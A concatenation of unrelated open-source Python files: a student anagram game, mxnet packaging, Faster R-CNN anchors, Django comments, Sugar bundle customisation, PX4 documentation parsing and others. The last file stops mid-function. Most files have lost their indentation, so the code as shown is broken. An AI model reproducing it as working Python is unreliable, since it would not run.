# Extend the "Anagrams" game (see M. Dawson, "Python Programming for the Absolute Beginner", ch. 4) so that every word comes with a hint.
# The player earns the right to a hint when they have no guesses left.
# Design a scoring system in which players who guess the word without a hint score more than those who asked for one.
# Mitin D.S.
# 19.04.2016, 11:08
import random
ochki = 500000
slova = ("python", "programming", "computer", "university", "russia", "security", "informatics")
zagadka=random.choice(slova)
proverka = zagadka
i=0
jumble = ""
while zagadka:
bykva = random.randrange(len(zagadka))
jumble += zagadka[bykva]
zagadka = zagadka[:bykva] + zagadka[(bykva+1):]
print("Вы попали в передачу 'Анаграммы'")
print("Загаданное слово: ", jumble)
slovo = input ("Ваш ответ: ")
while (slovo != proverka):
if(slovo == "не знаю"):
print(i,"буква: ",proverka[i])
i+=1
if ochki <= 0:
break
slovo=input("Неправильно. Попробуй еще раз: ")
ochki-=50000
if slovo == proverka:
print("\nПравильно! Это слово: ", proverka)
print("Вы набрали",ochki," очков! Поздравляем!")
else:
print("К сожалению, у вас 0 очков, и вы проиграли :( Загаданное слово:",proverka)
input ("Нажмите ENTER для продолжения")
|
jermainewang/mxnet
|
refs/heads/master
|
tools/pip_package/setup.py
|
45
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, exec-used
"""Setup mxnet package."""
from __future__ import absolute_import
import os
import shutil
from setuptools import setup, find_packages
from setuptools.dist import Distribution
# We cannot import `mxnet/libinfo.py` in setup.py directly, since that would
# invoke mxnet/__init__.py, which introduces extra dependencies
CURRENT_DIR = os.path.dirname(__file__)
libinfo_py = os.path.join(CURRENT_DIR, '../../python/mxnet/libinfo.py')
libinfo = {'__file__': libinfo_py}
exec(compile(open(libinfo_py, "rb").read(), libinfo_py, 'exec'), libinfo, libinfo)
LIB_PATH = libinfo['find_lib_path']()
__version__ = libinfo['__version__']
class BinaryDistribution(Distribution):
def has_ext_modules(self):
return True
DEPENDENCIES = [
'numpy',
]
shutil.rmtree(os.path.join(CURRENT_DIR, 'mxnet'), ignore_errors=True)
shutil.copytree(os.path.join(CURRENT_DIR, '../../python/mxnet'),
os.path.join(CURRENT_DIR, 'mxnet'))
shutil.copy(LIB_PATH[0], os.path.join(CURRENT_DIR, 'mxnet'))
setup(name='mxnet',
version=__version__,
description=open(os.path.join(CURRENT_DIR, 'README.md')).read(),
zip_safe=False,
packages=find_packages(),
package_data={'mxnet': [os.path.join('mxnet', os.path.basename(LIB_PATH[0]))]},
include_package_data=True,
install_requires=DEPENDENCIES,
distclass=BinaryDistribution,
url='https://github.com/dmlc/mxnet')
|
EricssonResearch/scott-eu
|
refs/heads/master
|
simulation-ros/src/turtlebot2i/turtlebot2i_msdn/msdn/faster_rcnn/rpn_msr/generate_anchors.py
|
1
|
# --------------------------------------------------------
# Faster R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick and Sean Bell
# --------------------------------------------------------
import numpy as np
# Verify that we compute the same anchors as Shaoqing's matlab implementation:
#
# >> load output/rpn_cachedir/faster_rcnn_VOC2007_ZF_stage1_rpn/anchors.mat
# >> anchors
#
# anchors =
#
# -83 -39 100 56
# -175 -87 192 104
# -359 -183 376 200
# -55 -55 72 72
# -119 -119 136 136
# -247 -247 264 264
# -35 -79 52 96
# -79 -167 96 184
# -167 -343 184 360
#array([[ -83., -39., 100., 56.],
# [-175., -87., 192., 104.],
# [-359., -183., 376., 200.],
# [ -55., -55., 72., 72.],
# [-119., -119., 136., 136.],
# [-247., -247., 264., 264.],
# [ -35., -79., 52., 96.],
# [ -79., -167., 96., 184.],
# [-167., -343., 184., 360.]])
def generate_anchors_bak(ratios=[0.5, 1, 2],
scales=2**np.arange(3, 6), base_size=16):
"""
Generate anchor (reference) windows by enumerating aspect ratios X
scales wrt a reference (0, 0, 15, 15) window.
"""
    ratios = np.array(ratios)
scales = np.array(scales)
base_anchor = np.array([1, 1, base_size, base_size]) - 1
ratio_anchors = _ratio_enum(base_anchor, ratios)
anchors = np.vstack([_scale_enum(ratio_anchors[i, :], scales)
for i in xrange(ratio_anchors.shape[0])])
return anchors
def generate_anchors(ratios, scales, base_size=16):
# print 'ratios', ratios
# print 'scales', scales
base_anchor = np.array([1, 1, base_size, base_size]) - 1
w, h, x_ctr, y_ctr = _whctrs(base_anchor)
size = w * h
size_ratios = size / ratios
ws = np.round(np.sqrt(size_ratios))
hs = np.round(ws * ratios)
ws = ws * np.array(scales)
hs = hs * np.array(scales)
# print 'ws', ws
# print 'hs', hs
anchors = _mkanchors(ws, hs, x_ctr, y_ctr)
# print 'anchors', anchors
return anchors
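# Illustrative sketch (not an original comment): unlike generate_anchors_bak,
# this variant pairs ratios[i] with scales[i] element-wise, so the two arrays
# should have matching (broadcast-compatible) lengths:
#
#   anchors = generate_anchors(np.array([0.5, 1, 2]), np.array([8, 16, 32]))
#   anchors.shape   # (3, 4) -- one (x1, y1, x2, y2) box per ratio/scale pair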
def _whctrs(anchor):
"""
Return width, height, x center, and y center for an anchor (window).
"""
w = anchor[2] - anchor[0] + 1
h = anchor[3] - anchor[1] + 1
x_ctr = anchor[0] + 0.5 * (w - 1)
y_ctr = anchor[1] + 0.5 * (h - 1)
return w, h, x_ctr, y_ctr
def _mkanchors(ws, hs, x_ctr, y_ctr):
"""
Given a vector of widths (ws) and heights (hs) around a center
(x_ctr, y_ctr), output a set of anchors (windows).
"""
# print 'ws', ws
ws = ws[:, np.newaxis]
hs = hs[:, np.newaxis]
anchors = np.hstack((x_ctr - 0.5 * (ws - 1),
y_ctr - 0.5 * (hs - 1),
x_ctr + 0.5 * (ws - 1),
y_ctr + 0.5 * (hs - 1)))
return anchors
def _ratio_enum(anchor, ratios):
"""
Enumerate a set of anchors for each aspect ratio wrt an anchor.
"""
w, h, x_ctr, y_ctr = _whctrs(anchor)
size = w * h
size_ratios = size / ratios
ws = np.round(np.sqrt(size_ratios))
hs = np.round(ws * ratios)
anchors = _mkanchors(ws, hs, x_ctr, y_ctr)
return anchors
def _scale_enum(anchor, scales):
"""
Enumerate a set of anchors for each scale wrt an anchor.
"""
w, h, x_ctr, y_ctr = _whctrs(anchor)
ws = w * scales
hs = h * scales
anchors = _mkanchors(ws, hs, x_ctr, y_ctr)
return anchors
if __name__ == '__main__':
import time
t = time.time()
    a = generate_anchors(np.array([0.5, 1, 2]), np.array([8, 16, 32]))
print time.time() - t
print a
from IPython import embed; embed()
|
arifsetiawan/edx-platform
|
refs/heads/master
|
lms/djangoapps/mailing/management/commands/mailchimp_id.py
|
155
|
"""
mailchimp_id: Returns whether or not a given mailchimp key represents
a valid list.
"""
import sys
from optparse import make_option
from django.core.management.base import BaseCommand, CommandError
from mailsnake import MailSnake
class Command(BaseCommand):
"""
Given a mailchimp key, validates that a list with that key
exists in mailchimp.
"""
args = '<mailchimp_key web_id>'
help = 'Get the list id from a web_id'
option_list = BaseCommand.option_list + (
make_option('--key', action='store', help='mailchimp api key'),
make_option('--webid', action='store', dest='web_id', type=int,
help='mailchimp list web id'),
)
def parse_options(self, options):
"""Parses `options` of the command."""
if not options['key']:
raise CommandError('missing key')
if not options['web_id']:
raise CommandError('missing list web id')
return options['key'], options['web_id']
def handle(self, *args, **options):
"""
Validates that the id passed in exists in mailchimp.
"""
key, web_id = self.parse_options(options)
mailchimp = MailSnake(key)
lists = mailchimp.lists()['data']
by_web_id = {l['web_id']: l for l in lists}
list_with_id = by_web_id.get(web_id, None)
if list_with_id:
print "id: {} for web_id: {}".format(list_with_id['id'], web_id)
print "list name: {}".format(list_with_id['name'])
else:
print "list with web_id: {} not found.".format(web_id)
sys.exit(1)
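# Illustrative usage sketch (hypothetical key and web id values, not part of
# the original module) -- the command runs through Django's manage.py:
#
#   python manage.py mailchimp_id --key=<api_key>-us1 --webid=12345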
|
andrewsmedina/django
|
refs/heads/master
|
django/contrib/comments/models.py
|
125
|
from django.conf import settings
from django.contrib.comments.managers import CommentManager
from django.contrib.contenttypes import generic
from django.contrib.contenttypes.models import ContentType
from django.contrib.sites.models import Site
from django.core import urlresolvers
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.utils import timezone
from django.utils.encoding import python_2_unicode_compatible
COMMENT_MAX_LENGTH = getattr(settings, 'COMMENT_MAX_LENGTH', 3000)
class BaseCommentAbstractModel(models.Model):
"""
An abstract base class that any custom comment models probably should
subclass.
"""
# Content-object field
content_type = models.ForeignKey(ContentType,
verbose_name=_('content type'),
related_name="content_type_set_for_%(class)s")
object_pk = models.TextField(_('object ID'))
content_object = generic.GenericForeignKey(ct_field="content_type", fk_field="object_pk")
# Metadata about the comment
site = models.ForeignKey(Site)
class Meta:
abstract = True
def get_content_object_url(self):
"""
Get a URL suitable for redirecting to the content object.
"""
return urlresolvers.reverse(
"comments-url-redirect",
args=(self.content_type_id, self.object_pk)
)
@python_2_unicode_compatible
class Comment(BaseCommentAbstractModel):
"""
A user comment about some object.
"""
# Who posted this comment? If ``user`` is set then it was an authenticated
# user; otherwise at least user_name should have been set and the comment
# was posted by a non-authenticated user.
user = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name=_('user'),
blank=True, null=True, related_name="%(class)s_comments")
user_name = models.CharField(_("user's name"), max_length=50, blank=True)
user_email = models.EmailField(_("user's email address"), blank=True)
user_url = models.URLField(_("user's URL"), blank=True)
comment = models.TextField(_('comment'), max_length=COMMENT_MAX_LENGTH)
# Metadata about the comment
submit_date = models.DateTimeField(_('date/time submitted'), default=None)
ip_address = models.GenericIPAddressField(_('IP address'), unpack_ipv4=True, blank=True, null=True)
is_public = models.BooleanField(_('is public'), default=True,
help_text=_('Uncheck this box to make the comment effectively ' \
'disappear from the site.'))
is_removed = models.BooleanField(_('is removed'), default=False,
help_text=_('Check this box if the comment is inappropriate. ' \
'A "This comment has been removed" message will ' \
'be displayed instead.'))
# Manager
objects = CommentManager()
class Meta:
db_table = "django_comments"
ordering = ('submit_date',)
permissions = [("can_moderate", "Can moderate comments")]
verbose_name = _('comment')
verbose_name_plural = _('comments')
def __str__(self):
return "%s: %s..." % (self.name, self.comment[:50])
def save(self, *args, **kwargs):
if self.submit_date is None:
self.submit_date = timezone.now()
super(Comment, self).save(*args, **kwargs)
def _get_userinfo(self):
"""
Get a dictionary that pulls together information about the poster
safely for both authenticated and non-authenticated comments.
This dict will have ``name``, ``email``, and ``url`` fields.
"""
if not hasattr(self, "_userinfo"):
userinfo = {
"name": self.user_name,
"email": self.user_email,
"url": self.user_url
}
if self.user_id:
u = self.user
if u.email:
userinfo["email"] = u.email
# If the user has a full name, use that for the user name.
# However, a given user_name overrides the raw user.username,
# so only use that if this comment has no associated name.
if u.get_full_name():
userinfo["name"] = self.user.get_full_name()
elif not self.user_name:
userinfo["name"] = u.get_username()
self._userinfo = userinfo
return self._userinfo
userinfo = property(_get_userinfo, doc=_get_userinfo.__doc__)
def _get_name(self):
return self.userinfo["name"]
def _set_name(self, val):
if self.user_id:
raise AttributeError(_("This comment was posted by an authenticated "\
"user and thus the name is read-only."))
self.user_name = val
name = property(_get_name, _set_name, doc="The name of the user who posted this comment")
def _get_email(self):
return self.userinfo["email"]
def _set_email(self, val):
if self.user_id:
raise AttributeError(_("This comment was posted by an authenticated "\
"user and thus the email is read-only."))
self.user_email = val
email = property(_get_email, _set_email, doc="The email of the user who posted this comment")
def _get_url(self):
return self.userinfo["url"]
def _set_url(self, val):
self.user_url = val
url = property(_get_url, _set_url, doc="The URL given by the user who posted this comment")
def get_absolute_url(self, anchor_pattern="#c%(id)s"):
return self.get_content_object_url() + (anchor_pattern % self.__dict__)
def get_as_text(self):
"""
Return this comment as plain text. Useful for emails.
"""
d = {
'user': self.user or self.name,
'date': self.submit_date,
'comment': self.comment,
'domain': self.site.domain,
'url': self.get_absolute_url()
}
return _('Posted by %(user)s at %(date)s\n\n%(comment)s\n\nhttp://%(domain)s%(url)s') % d
@python_2_unicode_compatible
class CommentFlag(models.Model):
"""
Records a flag on a comment. This is intentionally flexible; right now, a
flag could be:
* A "removal suggestion" -- where a user suggests a comment for (potential) removal.
* A "moderator deletion" -- used when a moderator deletes a comment.
You can (ab)use this model to add other flags, if needed. However, by
design users are only allowed to flag a comment with a given flag once;
if you want rating look elsewhere.
"""
user = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name=_('user'), related_name="comment_flags")
comment = models.ForeignKey(Comment, verbose_name=_('comment'), related_name="flags")
flag = models.CharField(_('flag'), max_length=30, db_index=True)
flag_date = models.DateTimeField(_('date'), default=None)
# Constants for flag types
SUGGEST_REMOVAL = "removal suggestion"
MODERATOR_DELETION = "moderator deletion"
MODERATOR_APPROVAL = "moderator approval"
class Meta:
db_table = 'django_comment_flags'
unique_together = [('user', 'comment', 'flag')]
verbose_name = _('comment flag')
verbose_name_plural = _('comment flags')
def __str__(self):
return "%s flag of comment ID %s by %s" % \
(self.flag, self.comment_id, self.user.get_username())
def save(self, *args, **kwargs):
if self.flag_date is None:
self.flag_date = timezone.now()
super(CommentFlag, self).save(*args, **kwargs)
|
musicwarez/testproj
|
refs/heads/master
|
testproj/my_test/1.py
|
1
|
# -*- coding: utf-8 -*-
from PyQt4 import QtCore, QtGui
import sys
import login_form
import login
import untitled as main_window
import main
from Queue import Queue
class FirstWindow(login.LoginWindow):
def __init__(self, parent=None):
QtGui.QWidget.__init__(self, parent)
self.ui = login_form.Ui_LoginDialog()
self.ui.setupUi(self)
#self.thread = MyThread(self)
class MainWindow(main.MainWindow):
def __init__(self, parent=None):
QtGui.QMainWindow.__init__(self, parent)
self.ui = main_window.Ui_MainWindow()
self.ui.setupUi(self)
class MainClass(FirstWindow, MainWindow):
def __init__(self, parent=None):
FirstWindow.__init__(self, parent)
self.queue = Queue()
self.fw = FirstWindow()
self.main = MainWindow()
print "Try connect"
#self.connect(fw, QtCore.SIGNAL("logined()"), main.show)
if __name__ == "__main__":
import sys
app = QtGui.QApplication(sys.argv)
window = MainClass()
window.fw.show()
window.fw.center()
window.main.connect(window.fw, QtCore.SIGNAL("logined()"), window.main.show)
    # Show the window
    sys.exit(app.exec_())  # Start the event loop
|
dkodnik/arp
|
refs/heads/master
|
addons/im_livechat/__init__.py
|
40
|
import im_livechat
|
mujiansu/pip
|
refs/heads/develop
|
pip/_vendor/html5lib/treewalkers/genshistream.py
|
1730
|
from __future__ import absolute_import, division, unicode_literals
from genshi.core import QName
from genshi.core import START, END, XML_NAMESPACE, DOCTYPE, TEXT
from genshi.core import START_NS, END_NS, START_CDATA, END_CDATA, PI, COMMENT
from . import _base
from ..constants import voidElements, namespaces
class TreeWalker(_base.TreeWalker):
def __iter__(self):
# Buffer the events so we can pass in the following one
previous = None
for event in self.tree:
if previous is not None:
for token in self.tokens(previous, event):
yield token
previous = event
# Don't forget the final event!
if previous is not None:
for token in self.tokens(previous, None):
yield token
def tokens(self, event, next):
kind, data, pos = event
if kind == START:
tag, attribs = data
name = tag.localname
namespace = tag.namespace
converted_attribs = {}
for k, v in attribs:
if isinstance(k, QName):
converted_attribs[(k.namespace, k.localname)] = v
else:
converted_attribs[(None, k)] = v
if namespace == namespaces["html"] and name in voidElements:
for token in self.emptyTag(namespace, name, converted_attribs,
not next or next[0] != END
or next[1] != tag):
yield token
else:
yield self.startTag(namespace, name, converted_attribs)
elif kind == END:
name = data.localname
namespace = data.namespace
if name not in voidElements:
yield self.endTag(namespace, name)
elif kind == COMMENT:
yield self.comment(data)
elif kind == TEXT:
for token in self.text(data):
yield token
elif kind == DOCTYPE:
yield self.doctype(*data)
elif kind in (XML_NAMESPACE, DOCTYPE, START_NS, END_NS,
START_CDATA, END_CDATA, PI):
pass
else:
yield self.unknown(kind)
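# Minimal usage sketch (assumes genshi is installed; the markup is illustrative):
#   from genshi.input import XML
#   for token in TreeWalker(XML('<p>hello</p>')):
#       print(token)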
|
sauravpratihar/sugar
|
refs/heads/master
|
src/jarabe/view/customizebundle.py
|
10
|
# Copyright (C) 2011 Walter Bender
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import os
import glob
import hashlib
from gi.repository import Gtk
from sugar3 import profile
from sugar3.activity import bundlebuilder
from sugar3.datastore import datastore
from sugar3.env import get_user_activities_path
import logging
_logger = logging.getLogger('ViewSource')
BADGE_SUBPATH = 'emblems/emblem-view-source.svg'
BADGE_TRANSFORM = ' <g transform="matrix(0.45,0,0,0.45,32,32)">\n'
ICON_TRANSFORM = ' <g transform="matrix(1.0,0,0,1.0,0,0)">\n'
XML_HEADER = '<?xml version="1.0" ?> \
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" \
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" [\n\
<!ENTITY stroke_color "#010101">\n\
<!ENTITY fill_color "#FFFFFF">\n]>\n'
SVG_START = '<svg enable-background="new 0 0 55 55" height="55px" \
version="1.1" viewBox="0 0 55 55" width="55px" x="0px" xml:space="preserve" \
xmlns="http://www.w3.org/2000/svg" \
xmlns:xlink="http://www.w3.org/1999/xlink" y="0px">\n'
SVG_END = '</svg>\n'
def generate_unique_id():
"""Generate an id based on the user's nick name and their public key
(Based on schema used by IRC activity).
"""
nick = profile.get_nick_name()
pubkey = profile.get_pubkey()
m = hashlib.sha1()
m.update(pubkey)
hexhash = m.hexdigest()
nick_letters = "".join([x for x in nick if x.isalpha()])
if not nick_letters:
nick_letters = 'XO'
return nick_letters + '_' + hexhash[:4]
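# e.g. for nick "Walter" and a pubkey whose SHA-1 digest starts with "1a2b",
# this returns "Walter_1a2b" (illustrative values only).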
def generate_bundle(nick, new_basename):
"""Generate a new .xo bundle for the activity and copy it into the
Journal.
"""
new_activity_name = _customize_activity_info(
nick, new_basename)
user_activities_path = get_user_activities_path()
if os.path.exists(os.path.join(user_activities_path, new_basename,
'dist')):
for path in glob.glob(os.path.join(user_activities_path, new_basename,
'dist', '*')):
os.remove(path)
config = bundlebuilder.Config(source_dir=os.path.join(
user_activities_path, new_basename),
dist_name='%s-1' % (new_activity_name))
bundlebuilder.cmd_dist_xo(config, None)
dsobject = datastore.create()
dsobject.metadata['title'] = '%s-1.xo' % (new_activity_name)
dsobject.metadata['mime_type'] = 'application/vnd.olpc-sugar'
dsobject.set_file_path(os.path.join(
user_activities_path, new_basename, 'dist',
'%s-1.xo' % (new_activity_name)))
datastore.write(dsobject)
dsobject.destroy()
def _customize_activity_info(nick, new_basename):
"""Modify bundle_id in new activity.info file:
(1) change the bundle_id to bundle_id_[NICKNAME];
(2) change the activity_icon [NICKNAME]-activity-icon.svg;
(3) set activity_version to 1;
(4) modify the activity icon by applying a customize overlay.
"""
new_activity_name = ''
user_activities_path = get_user_activities_path()
info_old = open(os.path.join(user_activities_path, new_basename,
'activity', 'activity.info'), 'r')
info_new = open(os.path.join(user_activities_path, new_basename,
'activity', 'new_activity.info'), 'w')
for line in info_old:
if line.find('=') < 0:
info_new.write(line)
continue
name, value = [token.strip() for token in line.split('=', 1)]
if name == 'bundle_id':
new_value = '%s_%s' % (value, nick)
elif name == 'activity_version':
new_value = '1'
elif name == 'icon':
new_value = value
icon_name = value
elif name == 'name':
new_value = '%s_copy_of_%s' % (nick, value)
new_activity_name = new_value
else:
info_new.write(line)
continue
info_new.write('%s = %s\n' % (name, new_value))
info_old.close()
info_new.close()
os.rename(os.path.join(user_activities_path, new_basename,
'activity', 'new_activity.info'),
os.path.join(user_activities_path, new_basename,
'activity', 'activity.info'))
_create_custom_icon(new_basename, icon_name)
return new_activity_name
def _create_custom_icon(new_basename, icon_name):
"""Modify activity icon by overlaying a badge:
(1) Extract the payload from the badge icon;
(2) Add a transform to resize it and position it;
(3) Insert it into the activity icon.
"""
user_activities_path = get_user_activities_path()
badge_path = None
for path in Gtk.IconTheme.get_default().get_search_path():
if os.path.exists(os.path.join(path, 'sugar', 'scalable',
BADGE_SUBPATH)):
badge_path = path
break
if badge_path is None:
_logger.debug('%s not found', BADGE_SUBPATH)
return
badge_fd = open(os.path.join(badge_path, 'sugar', 'scalable',
BADGE_SUBPATH), 'r')
badge_payload = _extract_svg_payload(badge_fd)
badge_fd.close()
badge_svg = BADGE_TRANSFORM + badge_payload + '\n</g>'
icon_path = os.path.join(user_activities_path, new_basename, 'activity',
icon_name + '.svg')
icon_fd = open(icon_path, 'r')
icon_payload = _extract_svg_payload(icon_fd)
icon_fd.close()
icon_svg = ICON_TRANSFORM + icon_payload + '\n</g>'
tmp_path = os.path.join(user_activities_path, new_basename, 'activity',
'tmp.svg')
tmp_icon_fd = open(tmp_path, 'w')
tmp_icon_fd.write(XML_HEADER)
tmp_icon_fd.write(SVG_START)
tmp_icon_fd.write(icon_svg)
tmp_icon_fd.write(badge_svg)
tmp_icon_fd.write(SVG_END)
tmp_icon_fd.close()
os.remove(icon_path)
os.rename(tmp_path, icon_path)
def _extract_svg_payload(fd):
"""Returns everything between <svg ...> and </svg>"""
payload = ''
looking_for_start_svg_token = True
looking_for_close_token = True
looking_for_end_svg_token = True
for line in fd:
if looking_for_start_svg_token:
if line.find('<svg') < 0:
continue
looking_for_start_svg_token = False
line = line.split('<svg', 1)[1]
if looking_for_close_token:
if line.find('>') < 0:
continue
looking_for_close_token = False
line = line.split('>', 1)[1]
if looking_for_end_svg_token:
if line.find('</svg>') < 0:
payload += line
continue
payload += line.split('</svg>')[0]
break
return payload
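# e.g. a file containing the lines '<svg width="55">', '<rect/>' and '</svg>'
# yields the payload '<rect/>\n' (illustrative markup).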
|
jswanljung/iris
|
refs/heads/master
|
lib/iris/tests/experimental/__init__.py
|
17
|
# (C) British Crown Copyright 2010 - 2015, Met Office
#
# This file is part of Iris.
#
# Iris is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Iris is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Iris. If not, see <http://www.gnu.org/licenses/>.
"""
Experimental code is tested in this package.
"""
from __future__ import (absolute_import, division, print_function)
from six.moves import (filter, input, map, range, zip) # noqa
|
mcgill-robotics/Firmware
|
refs/heads/master
|
Tools/px4moduledoc/srcparser.py
|
2
|
import sys
import re
import math
import textwrap
class ModuleDocumentation(object):
"""
documentation for a single module
"""
valid_categories = ['driver', 'estimator', 'controller', 'system',
'communication', 'command', 'template']
max_line_length = 80 # wrap lines that are longer than this
def __init__(self, function_calls, scope):
"""
:param function_calls: list of tuples (function_name, [str(arg)])
"""
self._name = ''
self._category = ''
self._doc_string = ''
self._usage_string = ''
self._first_command = True
self._scope = scope
self._options = '' # all option chars
self._all_values = [] # list of all values
self._all_commands = []
for func_name, args in function_calls:
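            # e.g. ('DESCRIPTION', [...]) dispatches to self._handle_description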
attribute_name = '_handle_'+func_name.lower()
try:
f = getattr(self, attribute_name)
f(args)
except AttributeError:
raise Exception('unhandled function: PRINT_MODULE_'+func_name)
self._usage_string = self._wrap_long_lines(self._usage_string, 17)
def _handle_description(self, args):
assert(len(args) == 1) # description
self._doc_string = self._get_string(args[0])
def _handle_usage_name(self, args):
assert(len(args) == 2) # executable_name, category
self._name = self._get_string(args[0])
self._category = self._get_string(args[1])
self._usage_string = "%s <command> [arguments...]\n" % self._name
self._usage_string += " Commands:\n"
def _handle_usage_name_simple(self, args):
assert(len(args) == 2) # executable_name, category
self._name = self._get_string(args[0])
self._category = self._get_string(args[1])
self._usage_string = "%s [arguments...]\n" % self._name
def _handle_usage_command_descr(self, args):
assert(len(args) == 2) # name, description
name = self._get_string(args[0])
self._all_commands.append(name)
if self._first_command:
self._first_command = False
else:
self._usage_string += "\n"
if self._is_string(args[1]):
description = self._get_string(args[1])
self._usage_string += " %-13s %s\n" % (name, description)
else:
self._usage_string += " %s\n" % name
def _handle_usage_command(self, args):
assert(len(args) == 1) # name
args.append('nullptr')
self._handle_usage_command_descr(args)
def _handle_usage_default_commands(self, args):
assert(len(args) == 0)
self._handle_usage_command(['"stop"'])
self._handle_usage_command_descr(['"status"', '"print status info"'])
def _handle_usage_param_int(self, args):
assert(len(args) == 6) # option_char, default_val, min_val, max_val, description, is_optional
option_char = self._get_option_char(args[0])
default_val = int(args[1])
description = self._get_string(args[4])
if self._is_bool_true(args[5]):
self._usage_string += " [-%s <val>] %s\n" % (option_char, description)
self._usage_string += " default: %i\n" % default_val
else:
self._usage_string += " -%s <val> %s\n" % (option_char, description)
def _handle_usage_param_float(self, args):
assert(len(args) == 6) # option_char, default_val, min_val, max_val, description, is_optional
option_char = self._get_option_char(args[0])
default_val = self._get_float(args[1])
description = self._get_string(args[4])
if self._is_bool_true(args[5]):
self._usage_string += " [-%s <val>] %s\n" % (option_char, description)
self._usage_string += " default: %.1f\n" % default_val
else:
self._usage_string += " -%s <val> %s\n" % (option_char, description)
def _handle_usage_param_flag(self, args):
assert(len(args) == 3) # option_char, description, is_optional
option_char = self._get_option_char(args[0])
description = self._get_string(args[1])
if self._is_bool_true(args[2]):
self._usage_string += " [-%c] %s\n" % (option_char, description)
else:
self._usage_string += " -%c %s\n" % (option_char, description)
def _handle_usage_param_string(self, args):
assert(len(args) == 5) # option_char, default_val, values, description, is_optional
option_char = self._get_option_char(args[0])
description = self._get_string(args[3])
if self._is_bool_true(args[4]):
self._usage_string += " [-%c <val>] %s\n" % (option_char, description)
else:
self._usage_string += " -%c <val> %s\n" % (option_char, description)
if self._is_string(args[2]):
values = self._get_string(args[2])
self._all_values.append(values)
if self._is_string(args[1]):
default_val = self._get_string(args[1])
self._usage_string += " values: %s, default: %s\n" %(values, default_val)
else:
self._usage_string += " values: %s\n" % values
else:
if self._is_string(args[1]):
default_val = self._get_string(args[1])
self._usage_string += " default: %s\n" % default_val
def _handle_usage_param_comment(self, args):
assert(len(args) == 1) # comment
comment = self._get_string(args[0])
self._usage_string += self._wrap_long_lines("\n %s\n" % comment, 1)
def _handle_usage_arg(self, args):
assert(len(args) == 3) # values, description, is_optional
values = self._get_string(args[0])
self._all_values.append(values)
description = self._get_string(args[1])
if self._is_bool_true(args[2]):
values += ']'
self._usage_string += " [%-10s %s\n" % (values, description)
else:
self._usage_string += " %-11s %s\n" % (values, description)
def _get_string(self, string):
return string[1:-1] # remove the " at start & end
def _get_float(self, string):
f = string
if f[-1] == 'f':
f = f[:-1]
return float(f)
def _is_string(self, argument):
return len(argument) > 0 and argument[0] == '"'
def _is_bool_true(self, argument):
return len(argument) > 0 and argument == 'true'
def _get_option_char(self, argument):
assert(len(argument) == 3) # must have the form: 'p' (assume there's no escaping)
option_char = argument[1]
self._options += option_char
return option_char
def _wrap_long_lines(self, string, indentation_spaces):
"""
wrap long lines in a string
:param indentation_spaces: number of added spaces on continued lines
"""
ret = ''
for s in string.splitlines():
ret += textwrap.fill(s, self.max_line_length,
subsequent_indent=' '*indentation_spaces)+'\n'
return ret
def name(self):
return self._name
def category(self):
return self._category
def scope(self):
return self._scope
def documentation(self):
doc_string = self._doc_string
# convert '$ cmd' commands into code blocks (e.g. '$ logger start')
# use lookahead (?=...) so the multiple consecutive command lines work
doc_string = re.sub(r"\n\$ (.*)(?=\n)", r"\n```\n\1\n```", doc_string)
# now merge consecutive blocks
doc_string = re.sub(r"\n```\n```\n", r"\n", doc_string)
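        # e.g. "\n$ logger start\n$ logger status\n" ends up as one fenced
        # block containing both commands after the merge above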
return doc_string
def usage_string(self):
usage_string = self._usage_string
while len(usage_string) > 1 and usage_string[-1] == '\n':
usage_string = usage_string[:-1]
return usage_string
def options(self):
"""
get all the -p options as string of chars
"""
return self._options
def all_values(self):
"""
get a list of all command values
"""
return self._all_values
def all_commands(self):
"""
get a list of all commands
"""
return self._all_commands
class SourceParser(object):
"""
Parses provided data and stores all found parameters internally.
"""
# Regex to extract module doc function calls, starting with PRINT_MODULE_
re_doc_definition = re.compile(r'PRINT_MODULE_([A-Z_]*)\s*\(')
def __init__(self):
self._modules = {} # all found modules: key is the module name
self._consistency_checks_failure = False # one or more checks failed
self._comment_remove_pattern = re.compile(
r'//.*?$|/\*.*?\*/|\'(?:\\.|[^\\\'])*\'|"(?:\\.|[^\\"])*"',
re.DOTALL | re.MULTILINE)
def Parse(self, scope, contents):
"""
        Incrementally parse program contents and append all found module
        documentation to the list.
"""
# remove comments from source
contents = self._comment_remover(contents)
extracted_function_calls = [] # list of tuples: (FUNC_NAME, list(ARGS))
start_index = 0
while start_index < len(contents):
# skip whitespace
while start_index < len(contents) and contents[start_index] in [ ' ', '\t']:
start_index += 1
end_index = contents.find('\n', start_index)
if end_index == -1: end_index = len(contents)
line = contents[start_index:end_index]
# Ignore empty lines and macro #if's
if line == "" or line.startswith('#if'):
start_index = end_index + 1
continue
m = self.re_doc_definition.match(contents, start_index, end_index)
if m:
func_name = m.group(1)
end_index_match = m.span()[1]
